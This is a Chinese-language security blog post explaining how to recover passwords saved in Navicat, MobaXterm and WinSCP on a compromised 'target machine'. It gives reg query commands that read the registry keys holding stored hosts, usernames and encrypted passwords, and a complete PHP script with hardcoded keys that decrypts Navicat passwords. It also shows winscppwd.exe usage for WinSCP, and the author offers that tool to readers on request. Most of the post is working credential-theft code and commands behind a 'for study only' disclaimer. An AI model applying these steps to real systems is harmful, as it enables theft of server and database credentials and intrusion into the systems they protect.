常见连接工具保存密码获取

  • A+
所属分类:安全工具

之前有发过关于xshell&finalshell密码破解的文章,本文将继续对一些其他常见的连接工具进行讨论,如有错误,欢迎留言指出!


一、Navicat密码破解:

Navicat针对不同的数据库,它所存放的地点是不一样的:

MySQL-->:HKEY_CURRENT_USERSoftwarePremiumSoftNavicatServersMariaDB-->:HKEY_CURRENT_USERSoftwarePremiumSoftNavicatMARIADBServersMicrosoftSQL-->:HKEY_CURRENT_USERSoftwarePremiumSoftNavicatMSSQLServers Oracle-->:HKEY_CURRENT_USERSoftwarePremiumSoftNavicatOraServersPostgreSQL-->:HKEY_CURRENT_USERSoftwarePremiumSoftNavicatPGServersSQLite-->:HKEY_CURRENT_USERSoftwarePremiumSoftNavicatSQLiteServers


以mysql为例:

reg query "HKEY_CURRENT_USERSoftwarePremiumSoftNavicatServers"

列出了保存过密码的连接:

常见连接工具保存密码获取



查找关键值:host、UserName、pwd

reg query "HKEY_CURRENT_USERSoftwarePremiumSoftNavicatServers127.0.0.1" /s /v hostreg query "HKEY_CURRENT_USERSoftwarePremiumSoftNavicatServers127.0.0.1" /s /v usernamereg query "HKEY_CURRENT_USERSoftwarePremiumSoftNavicatServers127.0.0.1" /s /v pwd

将pwd的值拿去解密即可

常见连接工具保存密码获取



如果远程登陆到了目标机器,可以直接导出已保存的连接:

常见连接工具保存密码获取



勾选:导出密码


然后会导出为.ncx的文件,打开查看其内容如下:关键字:UserName="xx" Password="xx"

常见连接工具保存密码获取



Password是加密的,要做的就是破解这个密码,github上已有大佬写好了破解脚本,copy-->edit-->run即可,修改最后几行代码即可,脚本内容如下:

<?phpclass NavicatPassword{    protected $version = 0;    protected $aesKey = 'libcckeylibcckey';    protected $aesIv = 'libcciv libcciv ';    protected $blowString = '3DC5CA39';    protected $blowKey = null;    protected $blowIv = null;         public function __construct($version = 12){        $this->version = $version;        $this->blowKey = sha1('3DC5CA39', true);        $this->blowIv = hex2bin('d9c7c3c8870d64bd');    }         public function encrypt($string){        $result = FALSE;        switch ($this->version) {            case 11:                $result = $this->encryptEleven($string);                break;            case 12:                $result = $this->encryptTwelve($string);                break;            default:                break;        }                 return $result;    }         protected function encryptEleven($string){        $round = intval(floor(strlen($string) / 8));        $leftLength = strlen($string) % 8;        $result = '';        $currentVector = $this->blowIv;                 for ($i = 0; $i < $round; $i++) {            $temp = $this->encryptBlock($this->xorBytes(substr($string, 8 * $i, 8), $currentVector));            $currentVector = $this->xorBytes($currentVector, $temp);            $result .= $temp;        }                 if ($leftLength) {            $currentVector = $this->encryptBlock($currentVector);            $result .= $this->xorBytes(substr($string, 8 * $i, $leftLength), $currentVector);        }                 return strtoupper(bin2hex($result));    }         protected function encryptBlock($block){        return openssl_encrypt($block, 'BF-ECB', $this->blowKey, OPENSSL_RAW_DATA|OPENSSL_NO_PADDING);    }         protected function decryptBlock($block){        return openssl_decrypt($block, 'BF-ECB', $this->blowKey, OPENSSL_RAW_DATA|OPENSSL_NO_PADDING);    }         protected function xorBytes($str1, $str2){        $result = '';        for ($i = 0; $i < strlen($str1); $i++) {            $result .= chr(ord($str1[$i]) ^ ord($str2[$i]));        }                 return $result;    }         protected function encryptTwelve($string){        $result = openssl_encrypt($string, 'AES-128-CBC', $this->aesKey, OPENSSL_RAW_DATA, $this->aesIv);        return strtoupper(bin2hex($result));    }         public function decrypt($string){        $result = FALSE;        switch ($this->version) {            case 11:                $result = $this->decryptEleven($string);                break;            case 12:                $result = $this->decryptTwelve($string);                break;            default:                break;        }                 return $result;    }         protected function decryptEleven($upperString){        $string = hex2bin(strtolower($upperString));                 $round = intval(floor(strlen($string) / 8));        $leftLength = strlen($string) % 8;        $result = '';        $currentVector = $this->blowIv;                 for ($i = 0; $i < $round; $i++) {            $encryptedBlock = substr($string, 8 * $i, 8);            $temp = $this->xorBytes($this->decryptBlock($encryptedBlock), $currentVector);            $currentVector = $this->xorBytes($currentVector, $encryptedBlock);            $result .= $temp;        }                 if ($leftLength) {            $currentVector = $this->encryptBlock($currentVector);            $result .= $this->xorBytes(substr($string, 8 * $i, $leftLength), $currentVector);        }                 return $result;    }         protected function decryptTwelve($upperString){        $string = hex2bin(strtolower($upperString));        return openssl_decrypt($string, 'AES-128-CBC', $this->aesKey, OPENSSL_RAW_DATA, $this->aesIv);    }};  //需要指定版本两种,11或12//$navicatPassword = new NavicatPassword(11);$navicatPassword = new NavicatPassword(11); //解密//$decode = $navicatPassword->decrypt('15057D7BA390');$decode = "密码:".$navicatPassword->decrypt('获取到的密码');echo $decode."n";?>


推荐一个在线运行脚本的网站:https://tool.lu/coderunner/

直接将脚本内容复制,修改注释的地方,运行即可获取到密码:

常见连接工具保存密码获取




二、MobaXterm密码获取:

设置-->配置

常见连接工具保存密码获取


然后点击显示密码即可直接看到明文密码:

常见连接工具保存密码获取

个人版测试不行,专业版应该是可以的:

常见连接工具保存密码获取




三、winscp密码获取:

1、首先对方的winscp要设置保存密码:

常见连接工具保存密码获取


2、Winscp保存密码存储的位置:

默认情况下,Winscp配置会存储在Windows对应的注册表项下(包括了连接的IP、用户名、密码

Hash),注册表项是固定的

HKEY_CURRENT_USERSoftwareMartin PrikrylWinSCP 2Sessions


3、获取保存的连接信息:

reg query "HKEY_CURRENT_USERSoftwareMartin PrikrylWinSCP 2Sessions"

查询到保存的连接:

常见连接工具保存密码获取


reg query "HKEY_CURRENT_USERSoftwareMartin PrikrylWinSCP 2Sessionsroot@192.168.136.144"

指定某个连接,导出其保存的详细信息:

常见连接工具保存密码获取


然后利用winscppwd.exe进行破解:

winscppwd.exe <UserName> <HostName> <Password>

破解成功:

常见连接工具保存密码获取


如果远程登陆到了目标,可以导出文件进行解密:

常见连接工具保存密码获取


导出的文件为.ini后缀,直接用winscppwd.exe对.ini文件进行解密即可:

winscppwd.exe xx.ini

解密成功:

常见连接工具保存密码获取


如果管理员自定义了保存密码文件的路径,可以尝试查找winscp.ini文件,将其拖回本地进行解密


密码破解的工具,后台留言winscppwd即可获取


文章和工具仅作为学习和讨论使用,禁止利用其进行任何违法行为,与作者无关!


发表评论

:?: :razz: :sad: :evil: :!: :smile: :oops: :grin: :eek: :shock: :???: :cool: :lol: :mad: :twisted: :roll: :wink: :idea: :arrow: :neutral: :cry: :mrgreen: